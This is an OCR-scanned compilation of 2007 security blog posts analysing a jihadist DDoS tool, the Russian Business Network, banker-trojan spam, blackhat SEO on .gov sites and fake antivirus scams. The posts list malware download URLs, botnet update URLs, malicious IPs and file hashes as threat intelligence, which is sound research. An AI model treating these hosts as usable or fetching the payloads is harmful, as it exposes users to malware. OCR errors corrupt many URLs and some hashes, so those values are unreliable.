ClamAV - Flooder.VB-15 

Panda - Suspicious file 

Symantec - Hacktool.DoS 

In a [lljpeople's information warfare incident where the 
ones contributing bandwidth would on purposely shut down 

their AVs, does it really matter whether or not an perimeter 
defense solution detects it? It does from the perspective of 
wannabe cyber jihadists wanting to using their company's 
bandwidth for the purposely, an environment in which 

they are hopefully not being able to shut down the AV, thus 
forwarding the responsibility for the participation in the 
attack to their companies. 

Al-jinan.org has been down since the Electronic Jihad 
Against Infidel Sites campaign became evident, the 
question is - where's the current DDoS campaign site? A 


mirror of the first campaign is available here - al- 

ansar. virtue.nu. 

[12]Cached copy of al-jinan.net (202.71.104.200) is still 
available. Emails related to Al Ansar Hacking Group - the 

crusaders hell @ yahoo.com; the crusaders hell (g> 
hotmail.com; al-ansar @ gooh.net Now the interesting 
part 

- where are Al-Jinan's new target synchronization URLs, and 
did they actually diversified them given that Al-Jinan.net is 
now down courtesy of what looks like Warintel's efforts? 
Partly. Here are the update URLs found within the binary : 

al-jinan.net/ntarg.php?notdoing=yes 

al-jinan.net/ntarg.php?howme=re 
a l-j inan.net/tlog.php? 
al-jinan.net/tnewu.php? 
arddra.host.sk/ntarg.php 
jofpmuytrvcf.com/ntarg.php 
jo-uf. net/nta rg. php 
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All are down, and jo-uf.net was among the domains used in 
the first version of the attack. If you think about it, even a 
wannabe botnet master will at least ensure the botnet's 
update locations are properly hardcoded within the 
malware. 


More details on [13]jo-uf.net. 


Let's discuss what cyber jihad isn't. Cyber jihad is anything 
but shutting down the critical infrastructure of a country in 
question, despite the potential for blockbuster movie 
scenario here. It's [14]news stories like these, emphasizing 

on abusing the Internet medium for achieving their 
objectives in the form of recruitment, research, fund raising, 

propaganda, training, compared to wanting to shut it down. 
Logically, this is where all the investments go, because this 
is the most visible engagement point between a 
government and potential cyber terrorists - its critical 
infrastructure. 

I'm not saying don't invest in securing it, I'm just 
emphasizing on the fact that you should balance such 
spendings 

with the pragmatic reality which can be greatly described 
by using an analogy from the malware world, and how what 

used to be destructive viruses are now the types of malware 
interested in abusing your data, not destroying it. 

The real threat does not come from wannabe cyber jihadists 
flooding a particular site in a coordinated manner, but 

from [15]outsourcing the entire process to those who 
specialize in the service, or providing the infrastructure for 
it on demand. Now that's of course given they actually 
manage to keep up the update locations for longer than 24 
hours, 

and achieve the mass effect of wannabe cyber jihadists 
using it all at once, the type of [16]Dark Web Cyber Jihad 


trade-off. 



1. http://ddanchev.blo as DOt.com/20Q7/01/preventin a- 
massive-al-aaeda-cvber.html 

2. http://ddanchev.blo as pot.com/2007/Q8/analvses-of-cvber- 
j ihadist-forums-and.html 

3. http://ddanchev.blo as pot.com/20Q6/10/scada-securit v- 
incidents-and-critical.html 

4. http://ddanchev.blo as pot.com/2007/08/cvber- if hadist- 
dos-tool.html 

5. 

http://www.scma a azine.com/uk/news/article/764556/websit 

e-al-aaeda-cvber- i ihad-be a in-nov-11/ 

6 . 

http://weblo a .infoworld.com/robertxcrin ael v/archives/2007/ 
11/cvber terrorism.html 

7. http://www.foxnews.eom/storv/0 . 2933 . 307601 . 00.html 

8. http://www.itbusinessed a e.com/blo a s/hdw/7p = 1134 

9. http://ddanchev.blo as pot.com/20Q7/10/peoples- 
i nformation-warfare-concept.html 

10. http://warintel.blo as pot.com/20Q7/ll/al- nannet-is- 
back.html 


11. http://ddanchev.blo as pot.com/20Q7/10/peoples- 
informat t on-warfare-concept.html 

12. htt p://72.14.209.104/search? 

hl = en&a = cache%3Awww.al- i inan.net 
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13. http://terroronline.wordoress.com/2006/ll/01/the- 
electronicHihad-that-wasnt/ 


14. 

http://www.timesonline.co.uk/tol/news/uk/crime/article2821 

lOl.ece 


15. http://ddanchev.blo as oot.com/2QQ7/lQ/botnet-on- 
demand-service.html 


16. http://ddanchev.blo as oot.com/2QQ7/Q9/dark-web-and- 
c vber- i ihad.html 
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Go to Sleep, Go to Sleep my Little RBN (2007-11-08 
16:59) 

Yesterday, [ 1 ]PauI Ferguson tipped [2]me on the [3]sudden 
disappearance of the [4]Russian Business Network. And 

just like babies have different understanding of day and 
night, the RBN isn't interested in going to sleep too, in fact 
there's a speculation that [5]they're relocating their 
infrastructure to China, speculation in terms of that it could 
be another such localized RBN operation : 

" Jamz Yaneza, a Trend Micro research project manager, 
agreed. "We're seeing signs of RBN-iike activity elsewhere, 
in Turkey, Taiwan and China. RBN may be moving to places 
even more inaccessible to the law [than Russia]. 

Everyone knows they were in St. Petersburg, but now 
they're changing houses, changing addresses. The 
Spamhaus 















Project antispam group has posted information that 
indicates RBN may have already laid claim to IP blocks 
located 

in China, Shanghai in particular. " 

It's always a pleasure to monitor the RBN, a single activity 
on behalf of their customers represents an entire 

sample to draw conclusions out of. Catch up with such 
activities like over [6]100 Malwares Hosted on a Single RBN 

IP, [7]Fake Anti Virus and Anti Spyware Software, and the 
most recent [8]Fake Suspended Account Messages while 

the IPs are alive and serving exploits and malware. Well, 
used to. 

UPDATE: [9]RBN - Russian Business Network, Chinese Web 
Space and Misdirection 

1. http://fer a daw a .blo as oot.com/ 

2. http://blo a .trendmicro.com/rbn- a oes-poof/ 

3. 

http://blo a .washin a tonpost.com/securitvfix/2QQ7/ll/russian 
business network down.html 
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4. http://en.wikipedia.or g /wiki/Russian_Business_Network 

5. http://www.computerworld.com/action/article.do? 
command =viewArticleBasic&articl eld=904592 9 

6. http://ddanchev.blo as pot.com/20Q7/lQ/over-lQQ- 
malwares-hosted-on-sin a le-rbn.html 


























7. http://ddanchev.blo as pot.com/2QQ7/lQ/russian-business- 
network.html 


8. http://ddanchev.blo as pot.com/2QQ7/ll/detectin a -and- 
blockin a -russian-business.html 

9. http://rbnexploit.blo as pot.com/2QQ7/ll/rbn-russian- 
business-network-its-use-of.html 
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Yet Another Malware Outbreak Monitor (2007-11-09 
15:28) 

Such [l]early warning security events systems always come 
as handy research tools for security analysts and 

reporters, and it's great to see that more and more vendors 
are continuing to share [2]interactive threats data 

in real-time, type of data that used to be proprietary one 
several years ago. Commtouch's recently announced 

[3]Malware Outbreak Center is another step in the right 
direction of intelligence data sharing, and building more 

transparency on emerging spam and malware outbreaks : 

" The Commtouch Malware Outbreak Center displays a 
sample of email-borne malware that has recently been 

detected and blocked by Commtouch's Zero-Hour(TM) Virus 
Outbreak Protection solution. It also incorporates data 

from AV-Test.org, an independent third-party organization 
that tests most of the commercially available anti-virus 














scanners. This data enables the Center to publish 
comparative detection times for leading AV vendors, a first 
in this comprehensive format which includes malware 
variant checksum. Detection times are critical, since 
individual virus variants often peak and then nearly 
disappear, all in under three hours. IT managers now have 
access to an online 

tool that allows them to verify their AV vendor's 
performance for each new outbreak, and to download 
comparative 

data per malware variant. " 

Zero day DIY malware, and open source one undermine the 
reactive response time's model, but without anti 

virus signatures in 2007 your company and customers 
would still be getting infected by outdated Netsky samples - 

it's a fact, yet not the panacea of dealing with malware, and 
has never been. Another important issue that deserves 

to be discussed is the issue with the [4]virus outbreak time 
of different vendors in [5]Stormy Wormy times for 

instance. In the past, vendors were even using their 
detection in the wild, and on-the-fly binary obfuscation 
which 

in times of [6]open source malware results in [7]countless 
number of variants. Good PR is vital, and so is gaining 
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competitive advatange in the minds of prospective 
customers by positioning the company among the first to 



have responded to the outbreak, but it raises the issue on 
the degree of exchanging malware samples between the 

vendors themselves, and the lack of transparency here. The 
way initiatives in the form of honeyfarms contributing 

hundreds of malware samples, and "wisdom of crowds" end 
users filling the gaps in reactive response indirectly protect 
millions of customers on behalf of anti virus software, in this 
very same way exchanging malware samples in 

the shortest possible time frame, ultimately benefits each 
and every customer and organization that's having an anti 

virus in its perimeter defense strategy. 

A non-profit honeyfarm can collect hundreds of thousands of 
undetected malware samples in a single month, 

let's speculate that it could even outperform a small AV 
vendor's malware aggregation capabilities. In the anti virus 

industry, branding is crucial and therefore the non-profit 
honeyfarm cannot enter the market, instead, it's only 

incentive to donate the samples to the anti virus vendors is 
that of social responsibility. AVs should build more 

awareness on the importance of malware samples sharing 
among them, compared to pitching themselves as the 

vendor who first picked up the outbreak and protected its 
customers. Bargaining with someone's upcoming infec¬ 
tion isn't that much of a success if you think about it. "Hey 
that signature is mine" days should have been over by now. 



Moreover, it's a basic principle of every competitive market 
that the more competition, the more choices the 

customer would have, thereby making vendors innovate or 
cease to exist in irrelevance. Does the same apply to 

the anti virus market? Can we have a buiIt-to-flip honeyfarm 
into an anti virus vendor to be later on acquired and 

integrated within a company's existing products portfolio? 
Let's hope not, and it's doubtful as there's a difference 

between an anti virus software and an "anti virus software", 
at least from the perspective that the second "anti virus 
software" may be occupying markets that could have 
otherwise been served by a better market proposition. 

Product development of an AV courtesy of a security 
vendor's products portfolio given the vendor realized that a 

huge percentage of security spending goes to perimeter 
defense solutions can be tricky, and even if acquisition has 

taken place you'd better stick to a company whose core 
competency is anti virus solutions. 

[8 ]Sti 11 Living in the Perimeter Defense World? 

1. http://ddanchev.blo as pot.com/2QQ7/Q6/earlv-warnin a- 
securitv-event-svstems.html 

2. http://www.commtouch.com/Site/Resources/statistics.as p 

3. 

http://www.commtouch.com/Site/ResearchLab/VirusLab/rece 

nt activitv.as p 











4. http://ddanchev.blo as pot.com/2QQ6/Q8/virus-outbreak- 
response-time.html 


5. http://ddanchev.blo as pot.com/2Q07/Q8/storm-worm- 
malware-back-m- a ame.html 

6. http://ddanchev.blo as pot.com/2QQ7/Q9/localizin a-o pen- 
source-malware.html 

7. http://ddanchev.blo as pot.com/2QQ6/Q8/malware-bot- 
famines-technolo a v-and.html 

8. http://ddanchev.blo as pot.com/20Q7/Ql/still-livin a -in- 
perimeter-defense-world.html 
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Targeted Spamming of Bankers Malware (2007-11-12 
13:22) 

This particular incident is interesting mostly because we 
have a good example that [l]once a site gets compromised 

the potential for abusing the access for malware distribution 
becomes very realistic, this is in fact what happened with 
autobroker.com.pl, as the following URLs were active as of 
yesterday, now down due to notification. Basically, the 
compromised host, compromised in an [2]automatic and 
efficient way for sure, started acting as the foundation for 

the campaign, which as it looks like was spammed in a 
targetted manner. A tiny php file at 

autobroker.com.pl/l.php 

was launching the downloader: 





















[ 3 ]TROJ. BAN LOAD 
Result: 18/31 (58.07 %) 

File size: 46080 bytes 

MD5: 690e71077c9d78347368c6cf8752741e 
SHA1: 7dedad0778a24c69d6df4c8ceedc94f20292473e 

the downloader then drops the following bankers that are 
strangely hosted on the French site [4]Opus Cita¬ 
tum, and are still active : 

opuscitatum.com/modules/PHP %20Files/ _ 
steampwl2318897 _.exe 

Trojan-Spy. Win 32. Ban ker.ciy 

Result: 9/32 (28.13 %) 

File size: 2498560 bytes 

MD5: ceelfdea650487e0865alb8831dble73 

SHA1: ad55ff3e5519d88b930d6a0a695e71fcc253351e 

opuscitatum.com/modules/PHP %20Files/lvete 
Sangalo.scr 
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Troj an. PWS. Banker 
Result: 13/32 (40.63 %) 

File size: 2505216 bytes 



MD5: Ibdb0d3el3b93c76e50b93dbladeed3e 

SHA1: f472693da81202f4322425b952ec02cbff8d72bc 

The campaign was originally spammed with the messages : 

11 Chegou 1 vivo foto torpedo" and " Vivo torpedo foi enviado 
de um celular para seu e" by using the web based spammer 
you can see in the attached screenshot. 

More info about [5]banking malware, comments on a 
recently advertised [6]metaphisher malware kit with 

banker trojans infected hosts only showcasing the 
[7]malicious economies of scale botnet masters mentality, 
as well 

as [8]related posts on [9]targeted malware [lOjattacks. 

1. http://seclists.or a /fulldisclosure/2QQ7/Oct/Q892.html 

2. http://ddanchev.blo as pot.com/2QQ7/07/sal-in i ection- 
throu a h-search-en a ines.html 

3. 

http://www.trendmicro.com/vinfo/virusencvclo/default5.as p? 
VName=TRO I BANLOAD.BFT 

4. http://opuscitatum.com/ 

5. http://www.f- 

secure.com/weblo a /archives/VB2QQ7_TheTro i anMone vS pinn 

er.pdf 

6. http://ddanchev.blo as pot.com/2QQ7/ll/metaphisher- 
malware-kit-spotted- i n-wild.html 

7. http://ddanchev.blo as pot.com/2QQ7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 


































8. http://ddanchev.blo as pot.com/2QQ7/Q4/outsourcin a- 
spvina -on-vour-wife.html 


9. http://ddanchev.blo as pot.com/2007/Q9/infectin a -terrorist- 
suspects-with.html 

10. http://ddanchev.blo as pot.com/2QQ7/Q7/tar a eted- 
extortion-attacks-at.html 
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p0rn.gov - The Ongoing Blackhat SEO Operation 
(2007-11-12 16:32) 

Want prOn? Try [l].gov domains in general, ones that have 
been getting the attention of blackhat SEO-ers for a while, 

just like the most recent related cases where the [2]City of 
Chetek, Winsonsin, the City of Somerset, Texas and Town 

of Norwood, Massachusetts got their blackhat SEO injection. 
The previous attack is related to the one I'll assess in 

this post, the blackhat SEO tool is the same given the static 
subdomains generated, what remains to be answered is 

how they've managed to get access to the control panels of 
the domains in order to add the subdomains? Let's look 

at the facts : 

- the targets in this attack are The Virgin Islands Housing 
Finance Authority (VIHFA), and the City Of Selma, 
Alabama 















- this is the second blackhat SEO operation uncovered 
during the past couple of months targeting .gov domains 

- access to the control panels is somehow obtained so that 
subdomains pointing to 89.28.13.207 (89-28-13- 

207.starnet.md) and 89.28.13.195 (89-28-13- 
195.starnet.md) are added at both domains 

- both .gov domains that are targets in this attack are using 
a shared hosting provider, meaning their IP reputation is in 
the hands of everyone else's web activities responding 
under the same IP 

- no malware is served in this incident, compared to [3]the 
previous one, a combination of malware and blackhat SEO 

Subdomains at City of Selma currently hosting around 9000 
blackhat SEO pages : 
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m21.selma-al.gov 

m22.selma-al.gov 

m23.selma-al.gov 

m24.selma-al.gov 

m25.selma-al.gov 

m26.selma-al.gov 

m27.selma-al.gov 


m28.selma-al.gov 

m29.selma-al.gov 

m30.selma-al.gov 

m31.selma-al.gov 

m32.selma-al.gov 

m33.selma-al.gov 

m34.selma-al.gov 

Subdomains at the Virgin Islands Housing Finance Authority 
with constantly changing structure : 

al.a.vihfa.gov 

a2.a.vihfa.gov 

a3.a.vihfa.gov 
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a4.a.vihfa.gov 
a5.a.vihfa.gov 
a6.a.vihfa.gov 
a7.a.vihfa.gov 
a8.a.vihfa.gov 
a9. a. vihfa.gov 
alO. a. vihfa.gov 



Related subdomains now no longer responding : 

2kl 10.x. vihfa.gov 
2kl06.x. vihfa.gov 
jll.y. vihfa.gov 
j9.y.vihfa.gov 
zl.z. vihfa.gov 

Where's the connection between this blackhat SEO 
operation and [4]the previous one? It's not just that both 

subdomains at the different .gov's are responding to IPs 
from the same netblock, but also, 89.28.13.202 is 
responding to City of Somerset's subdomains from the 
previous incident such as : j6.y.somersettx.gov; 
st9.x.somersettx.gov; x.somersettx.gov. 

Looks like someone in Moldova will get spanked for these 
incidents. 

1. http://www.comDuterworld.com/blo a s/node/6138 

2. http://ddanchev.blo as pot.com/2QQ7/lQ/compromised- 
sites-servin a -malware-and.html 

3. http://ddanchev.blo as pot.com/2QQ7/lQ/compromised- 
sites-servin a -malware-and.html 

4. http://ddanchev.blo as pot.com/2QQ7/lQ/compromised- 
sites-servin a -malware-and.html 
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Teaching Cyber Jihadists How to Hack (2007-11-12 
20:57) 

Yet another indication of the emerging trend of building a 
knowledge-driven cyber jihadist community, are such online 

archives with localized to Arabic standard security and 
hacking research papers, ones you definitely came across to 

before, or may have in fact written by yourself. As I've 
already discussed this trend in previous posts, it's a PSYOPS 

strategy in action, one that's aiming to improve the overall 
perception of cyber jihadists' ability to wage [ljtheir battles 
without [2]using software and web services [3]of their 
enemies. Whether the investment in time and resources is 

worth it is another topic, what's worth pointing out are the 
efforts they put into localizing the content in between 

adding the standard propaganda layer, and later on, 
[4]building a community around it. 

1. http://ddanchev.blo as pot.com/2007/05/ n hadists- 
anonvmous-mternet-surfin a .html 

2. http://ddanchev.blo as pot.com/2007/Q4/mu i ahideen- 
secrets-encr v otion-tool .html 

3. http://ddanchev.blo as pot.com/2007/Q7/cvber- n hadists- 
and-tor.html 

4. http://ddanchev.blo as pot.com/2007/Q9/dark-web-and- 
c vber- i ihad.html 
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Scammy Ecosystem (2007-11-14 16:27) 

In this example of a scammy ecosystem, you have a single 
IP (88.255.90.50) hosting the now, retro [l]WebAttacker 
exploitation kit (inn2coming.com/income/index.php), a 
viagra scam (pctabletshop.hk) on the second parked 
domain, and an investment banking scams on another two - 
progold-inv.biz; cfinancialservice.com. Now, all they're 
missing is a [2]Rock Phish kit hosted on it and it would have 
made it an even more interesting operation to monitor. Of 
course putting more personal efforsts into everything pays 
off. The same netblock is also hosting such popular 
downloader's 

update locations and live exploit URLs such as 

statlcount.net; alllcount.net; and the recently 
appeared on the radar mediacount.net (88.255.90.253). 

1. http://ddanchev.blo as pot.com/2QQ7/05/webattacker-in- 
action.html 

2. http://ddanchev.blo as pot.com/2QQ7/lQ/assessin a -rock- 
phish-campai a n.html 
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Electronic Jihad's Targets List (2007-11-14 17:24) 

Despite the fact that the [l]Electronic Jihad 3.0 campaign 
was a futile attempt right from the very beginning, given 

the domains that were supposed to synchronize the targets 
to be attacked were down, it's interesting to try finding 

out who were they targeting at the first place? In the first 
campaigns, the URLs of the targets, not the victims since 










they couldn't scale enough to cause even partial damage, 
were obtainable via the web, compared to the third one 

where they were about to get synchronized. And since the 
synchronization URLs were down before we could take a 

peek, here are the targets URLs from the [2]first two 
campaigns. 

First campaign's targets list: 

gov.il 

keshmesh.net 

meca-love4all.com 

love4all.us 

Second campaign's targets list: 

love4all.us 

islameyat.com 

aldalil-walborhan.com 

rapsaweyat.com 

investigateislam.com 

meca-me.org 

ladeeni.net 
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meca-love4all.com 



The attached table is the classificaton of the attacks, as site 
to be attacked, reason for the attack, importance, 

the results, and the site's status after tha attack, namely is 
it up and running or shut down completely, and how 

shutting it down would please God. 

There's a saying that a person is judged by the type of 
enemies he has. If we apply it in this situation, you 

would see a bunch of inspired wannabe cyber jihadists 
whose biggest enemy is their idiocity at the first place. So, if 
these are the cyber jihadist enemies of yours - lucky you, 
and your critical infrastructure's integrity. 

1. http://ddanchev.blo as pot.com/2QQ7/ll/electronic- i ihad- 
v30-what-cvber- i ihad.html 

2. http://ddanchev.blo as pot.com/2007/Q8/cvber- if hadist- 
dos-tool.html 
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Popular Spammers Strategies and Tactics (2007-11- 
14 18:54) 

It's been a while since I last participated with an article for 
[ljWindowSecurity.com, so here it goes - [2]Popular 

Spammers Strategies and Tactics : 

" During 2007, spammers on a worldwide basis 
demonstrated their adaptability to the ongoing efforts anti- 













spam vendors put into ensuring their customers enjoy the 
benefits of having a spam-free inbox. What strategies 

do spammers use in order to achieve this? What tactics do 
they use in order to obtain email addresses, verify their 
validity, ensure they reach the highest number o f receipts 
as possible in the shortest time span achievable, while 
making sure their spam campaigns remain virtually 
impossible to shut down ?" 

The article covers strategies and tactics such as : 
Redirectors/doorway pages; Rapid tactical warfare; Verifica¬ 
tion/confirmation of delivery; Consolidation; Outsourcing; 
and Affiliation based models. 

1. http://windowsecuritv.com/ 

2. http://windowsecuritv.com/articles/Popular-Spammers- 
Strate a ies-Tactics.html 
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Cyber Jihadist Blogs Switching Locations Again 
(2007-11-15 21:05) 

Having had their blogs removed from Wordpress in a 
coordinated shutdown operation courtesy of the [l]wisdom 

of the anti cyber jihadist crowd, The [2]lgnored Puzzle 
Pieces of Knowledge and The [3]Caravan of Martyrs have 

switched location to these URLs - 

inshallahshaheed.muslimpad.com; 

inshallahshaheed.acbox.com; 

caravanofmartyrs.muslimpad.com; 










ignoredknowledge.blogspot.com. Apparently there's an 
ongoing migration of cyber jihad ist blogs from Word press to 
Muslimpads presumably with the idea to increase the time 
from a TOS abuse letter to shut 

down, if shut down ever occures given Muslimpad is 
significantly biased in removing such positioned as M [4]free 

speech" communities given it's hosting provider is 
islamicnetwork.com. Should such propaganda be 
tolerated? This is where the different mandates of anti cyber 
jihadist organizations across the world contradict with each 
other. 

Some have a mandate to shut down such blogs and sites as 
soon as they come across such, others have a mandate to 

monitor and analyze these to keep in pace with emerging 
threats in the form of real-time intelligence, and in the near 
future other participants will have a mandate to [5]infect 
such communities with malware ultimately [6]targeting the 

cyber jihadists behind them or the visitors themselves. 
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The bottom line - the propaganda in the form of step-by-step 
video of an attack in question is a direct violation of their 
operational security (OPSEC) thereby providing the world's 
intelligence community with raw data on 

their warfare tactics. The propaganda's trade off is similar to 
that of the [7]Dark Cyber Jihadist Web, while you may 

want to reach as many future recruits and "converts" as 
possible, you increase the chance of an intelligence analyst 
coming across your community, compared to closing it down 



to sorted and trustworthy individuals and therefore limiting 
the number of potential future jihadists. Inshallahshaheed 
are however, going for mass marketing with full speed, 

and in fact maintain a modest repository of videos at 

inshallahshaheed.vodpod.com. By the way, what's the 
dif¬ 


ference between wishful thinking and thought crime? It's 

[8] a threat that proves there's a positive ROI of your actions. 

Related posts : 

[9] GIMF Switching Blogs 

[10] GIMF Now Permanently Shut Down 

[11] GIMF - "We Will Remain" 

1. http://ddanchev.blo as pot.com/2QQ7/lQ/wisdom-of-anti- 
c vber- i ihadist-crowd.html 

2. http://ddanchev.blo as pot.com/20Q7/Q8/analvses-of-cvber- 
j ihadist-forums-and.html 

3. http://ddanchev.blo as pot.com/2QQ7/Q6/list-of-terrorists- 
blo a s.html 

4. http://www.there a ister.co.uk/2Q07/ll/06/eu_terror_web/ 

5. http://ddanchev.blo as pot.com/2007/Q9/infectin a -terronst- 
suspects-with.html 

6. http://www.there a ister.co.uk/2QQ7/10/23/teutonic_tro i an/ 

7. http://ddanchev.blo as pot.com/2007/Q9/dark-web-and- 
c vber- ihad.html 





























8. http://warintel.blo as DOt.com/2QQ7/ll/inshallahshaheed- 
makes-death-threats.html 


9. http://ddanchev.blo as pot.com/2007/07/ a irnf-switchin a- 
blo a s.html 

10. http://ddanchev.blo as pot.com/2007/Q8/ a imf-now- 
permanentlv-shut-down.html 

11. http://ddanchev.blo as pot.com/2007/Q8/ a imf-we-willl- 
remain.html 
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First Person Shooter Anti-Malware Game (2007-11- 
15 22:35) 

Just when you think you've seen everything "evil marketers" 
can come up to both, consciously and subconsciously 
influence your purchasing behaviour and improve the 
favorability scale towards a company - you can still get 

surprised. After a decent example of the [1JDIY marketing 
concept, Microsoft's perception of [2]security as a "threat 
from outer space", an example of [3]rebranding a security 
vendor, the [4]Invible Burglar game, here comes another 
good example of new media marketering practice - while 
some companies seek to embed their logos into popular 

games, others are coming up with ones on their own. 
[5]Symantec's Endpoint Protection Game - a first person 

shooter where the typically mutated creatures are replaces 
with viruses, spyware and rootkits is what I'm blogging 


about: 



















" Your task is to simply save your global network from 
viruses, worms, and a hideous host of online threats that 
are poised to take your IT infrastructure down. 11 

[6]Eye catching trailer as well. Such marketing campaigns 
can have a huge educational potential if they're, for 
instance, customized for a specific [7]security awareness 
program module. 

1. http://ddanchev.blo as pot.com/2QQ6/Q4/div-marketin a- 
culture.html 

2. http://ddanchev.blo as pot.com/2QQ7/05/microsofts- 
forefront-ad-campai a n.html 

3. http://ddanchev.blo as pot.com/2QQ7/ll/rebrandin a- 
securitv-vendor.html 

4. http://ddanchev.blo as pot.com/2QQ6/12/svmantecs- 
invisible-bur a lar- g ame.html 

5. http://www.svmantecendpoint a ame.com/ 

6. http://www.svmantecendpoint a ame.com/trailer 

7. http://www.windowsecuritv.com/ paa es/securit v- polic v.pdf 
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Lonely Polina's Secret (2007-11-16 16:13) 

Just as I've been monitoring lots of [ljspam that's using 
Geocities redirectors, yesterday Nicholas posted some 
details on a [2]malware campaign using Geocities pages as 
redirectors, and Roderick Ordonez [3]acknowledged the 
same. 
































Original Geocities URLs used : 

geocities.com/MediciChavez7861 (active) ; 
geocities.com/lliseNkrumah2 (down) ; 
geocities.com/GounodNanon5 (down). Original message 
of the spam campaign : 

" Hallo! Meine Name ist Polina. Ich bin Studentin und Ich 
babe zur Germany zu iernen angekommen . Ich 

suche mich den Freund und der Sex-Partner. Alter dass Ich 
will es ist ein guter Mann. Sie solien ernst, sicher, klug sein. 

Geben Sie mich zu wissen wenn Sie wollen mit mir treffen. 
Ebenso konnen Sie einfach mein Freund sein. Sie konnen 

meine Fotos auf meiner Seite sehen: 

geocities.com/MediciChavez7861 BUTE, NURR DIE ERNSTE 
Vorschlages. KUSSE, 

POLINA " 

The fake lonely German student Polina was also accessible 
from other URLs as well - ThePagesBargain.ru/polina; di- 
bopservice.com, both now down as well as the main 
58.65.238.36/polina URL which is forwarding to 
baby.com in an attempt to cover up the campaign - you 
wish. Internal pages within the IP are still accessible - 
58.65.238.36/index2 

files/index3.htm; 58.65.238.36/index2 
_files/index.htm, and so is the malware itself - 

58.65.238.36/i PIX-install.exe. 

Malware campaigners are not just setting objectives and 
achieving them, they're also evaluating the results 



and drawing conclusions on how to improve the next 
campaign. Back in January, 2006, I emphasized on [4]the 

emerging trend of localization in respect to malware, take 
for instance the release of a trojan in an open source 

form so that [5]hacking groups from different countries 
could localize it by translating to their native language and 
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making it even more easy to use, as well as [6]the 
localization of MPack and IcePack malware kits to Chinese. 

In this campaign, a localized URL was also available 
targeting Dutch speaking visitors 58.65.238.36/polinanl, 
so you you have a German and Dutch languages included, 
and as we've seen the ongoing consolidation of malware 
authors and 

spammers serves well to both sides, spammers will on one 
hand segment all the German and Dutch emails, and 

the malware authors will mass mail using localized message 
templates. Great social engineering abusing a common 

stereotype that for instance German users were definitely 
flooded with English messages courtesy of Storm Worm 

targeting U.S citizens, which is like a Chinese user who's 
receiving a phishing email from the Royal Bank of Scotland - 

it's obvious both of these are easy to detect. Which is what 
localization is all about, the malware and spam speaks 

your local language. One downsize of this campaign is that 
Polina doesn't really look like a lonely German student, in 
fact she's a model and these are some of her portfolio shots. 



Let's discuss how are the malware campaigners coming up 
with these Geocities accounts at the first place. 

Are the people behind the campaign manually registering 
them, outsourcing the registration process to someone 

else, or [7]directly breaking the [8]CAPTCHA? Could be even 
worse - they may be buying the already registered 

Geocities accounts from another group that's specializes in 
registering these, a group which like a previously covered 
concept of [9]Proprietary Malware Tools is earning revenues 
based on higher profit margins given they don't 

distribute the product, but provide the service thereby 
keeping the automatic registration process know-how to 

themselves. Once the authentication details are known, the 
process of anything starting from blackhat SEO, direct 

spamming, malware hosting, and embedding such scripts, 
even IFRAMEs in a fully automated fashion. 

Meanwhile, what are the chances there's [10]another 
scammy ecosystem on the same netblock? But of course. 

vai- 

choau.com fake watches, pimpmovie.net malware C &C, 

urolicali.com.cn spammers, westernunion.reg- 
login.com a phishing url. 

1. http://www.windowsecuritv.com/articles/Popular- 
S pammers-Strate a ies-Tactics.html 

2. http://www.diso a .or g /2QQ7/ll/stormworm-usin a- 
a eocities.html 










3. http://blo a .trendmicro.com/storm-brews-over- a eocities/ 


4. http://packetstormsecuriitv.or a/pa pers/ a eneral/malware- 
trends.odf 

5. http://ddanchev.blo as pot.com/2QQ7/Q9/localizin a-o oen- 
source-malware.html 

6. http://ddanchev.blo as pot.com/2Q07/lQ/mpack-and- 
icepack-iocaiized-to-chinese.html 

7. http://ddanchev.blo as pot.com/2QQ7/lQ/div-captcha- 
breakin a -service.html 

8. http://ddanchev.blo as pot.com/2QQ7/Q9/spammers-and- 
phishers-breakin a -captchas.html 

9. http://ddanchev.blo as pot.com/2QQ7/lQ/dvnamics-of- 
malware-industrv.html 

10. http://ddanchev.blo as pot.com/2QQ7/ll/scamm v- 
ecosvstem.html 
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But of Course I'm Infected With Spyware (2007-11-18 
18:30) 

Remember those old school fake hard drive erasers where a 
status bar that's basically doing a directory listing is 

shown, and HDD activity is stimulated so that the end user 
gets the false feeling of witnessing the process? [l]Fake 

anti spyware and anti virus software, like the ones courtesy 
of the now [2]fast-moving RBN, have been using this 






































tactic for a while, and adding an additional layer of social 
engineering tricks by obtaining the PCs details with simple 
javascript. The folks behind online-scan.com; 
spyware.online-scan.com; antivirus.online-scan.com 
own a far more deceptive domain name compared to RBN's 
ones. In fact, even an anti virus vendor could envy them for 
not picking it up earlier and integrating it in upcoming 
marketing campaign or service to come. SpywareSoftStop's 
statements : 623 
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11 At present the Internet is stuffed with viruses of any kind. 
Every PC is at risk and most probably IS infected. Anti¬ 
viruses can detect viruses only, but spyware, installed 
surreptitiously on a PC without the user's informed consent, 
is modified each day and solely particularized software can 
help to detect and remove it. However, a spyware program 
is rarely alone on a computer: an affected machine can 
rapidly be infected by many other components. In some 
infections, 

the spyware is not even evident; moreover, some types of 
spyware disable software firewalls and anti-virus software, 
and/or reduce browser security settings, thus opening the 
system to further opportunistic infections, much like an 
immune deficiency disease. Right now your system is going 
to be scanned and spyware, if any, will be detected. " 

The name servers preved.spywaresoftstop- 
support.com and medved.spywaresoftstop- 
support.com serve : spywaresoftstop.com; 
spywaresoftstop-cash.com; spywaresoftstop- 
support.com. The popup at online-scan.com that's now 
returning a 404 error for ldr.exe 

(downloadfilesldr.com/download/2/ldr.exe) will even 
appear if you try to close the window while your PC is "being 


scanned". What's ldr.exe? It's the default output of a [3]DIY 
malware courtesy of Pinch. 

1. http://ddanchev.blo as oot.com/2Q07/lQ/russian-business- 
network.html 

2. http://rbnexploit.blo as pot.com/2QQ7/ll/rbn-fake-tools- 
roa ue-software-bank-of.html 

3. 

http://pandalabs.pandasecuritv.com/archive/PINCH_2CQ0_- 

THE-TRO I AN-CREATOR.as px 
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The "New Media" Malware Gang (2007-11-18 23:49) 

Since [ 1 ]PossibiIity Media's Malware Fiasco, I've been 
successfully tracking the group behind the malware 
embedded 

attack at each and [2]every online publication of Possibility 
Media. Successfully tracking mostly because of their 

lack of interest in putting any kind of effort of making them 
harder to trace back, namely, maintaining a static web 

presence, but one with diversifying set of malware and 
exploits used. Possibility Media's main IFRAME used was 

208.72.168.176/e-Srlpt2210/index.php, and at 
208.72.168.176 we have a great deal of parked domains 
in standby mode such as : 


repairhddtech.com 














granddslp.net 

prevedltd.net 

stepling.net 

softoneveryday.com 

samsntafox.com 

himpax.com 

grimpex.org 

trakror.org 

dpsmob.com 

besotrix.net 

